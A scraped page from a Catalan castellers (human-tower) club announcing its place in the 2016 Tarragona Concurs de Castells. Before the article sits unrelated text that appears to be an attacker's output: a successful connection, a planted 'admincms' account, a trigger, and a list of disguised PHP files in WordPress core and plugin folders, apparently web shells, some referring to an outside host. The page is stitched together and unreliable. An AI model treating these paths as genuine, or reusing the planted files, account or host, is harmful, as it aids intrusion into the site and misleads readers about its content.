Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/privacy-policy-guide-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/edit-ajax-private-ajax-response-ajax-response-private.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ssh2-private-ajax-response-private-cron-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/index-ajax-response-private-stream-private-wp-ajax-response-stream.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-meta-cron-stream-core-ajax-response-ajax.php https://castellersdeberga.cat/wp-includes/SimplePie/Author-meta-core-stream.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-value-private-meta-wp-ajax-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Els Castellers de Berga serem al Concurs de Castells de Tarragona
 

Els Castellers de Berga serem al Concurs de Castells de Tarragona


Els Castellers de Berga serem al Concurs de Castells de Tarragonahttp://www.concursdecastells.cat/
El Concurs de Castells és una actuació de les millors colles castelleres del país que se celebra cada dos anys, a l’inici de la tardor dels anys parells. Un dels principals atractius del certamen és que és l’única diada de tota la temporada en què tots els castells reben una puntuació segons la seva dificultat. Prop de 7.000 persones gaudeixen com a públic de l’actuació castellera més important, que també gaudeix d’una àmplia cobertura mediàtica per part dels mitjans de comunicació catalans i, cada vegada més, d’arreu del món. 
El XXVI Concurs de Castells tindrà lloc els dies 25 de setembre a la plaça del Castell de Torredembarra i els dies 1 i 2 d’octubre a la Tarraco Arena Plaça de Tarragona. Al llarg de les tres jornades aplegarà les 42 millors colles castelleres del país. En la jornada del diumenge 2 d’octubre hi participen les 12 millors colles. Els Castellers de Berga participarem a la jornada del dissabte 1 d’octubre, on hi haurà entre la 13a i la 30a colla classificada. Per determinar en quina jornada del concurs participa cada colla, s’han tingut en compte els resultats entre l’1 de setembre de 2015 i el 31 d’agost de 2016. El 2014 i el 2012 els Castellers de Berga vam participar a la jornada del diumenge anterior, a Torredembarra, entre les colles 31 i 42. Després de 4 anys d’existència, entrar a la jornada de dissabte a la Tarraco Arena Plaça per mèrits propis ho vivim com un gran èxit i un reconeixement a la feina feta durant la nostra curta història.
Ser a Tarragona l’1 d’octubre de 2016 significa ser entre les 30 millors colles del país, d’entre el centenar de colles que existeixen actualment. Serem la formació més novella de les 30 que actuaran a la Tarraco Arena Plaça. Dissabte 1 d’octubre serem els representants de Berga i el Berguedà a l’esdeveniment més mediàtic dels castells. Per a preparar-ho, farem alguns assajos especials i ens marquem l’objectiu de mobilitzar més de 200 membres a Tarragona. Per això convidem als berguedans i berguedanes a participar als assajos al Cine Catalunya així com al desplaçament al concurs perquè, entre tots, portarem a Tarragona els millors castells possibles.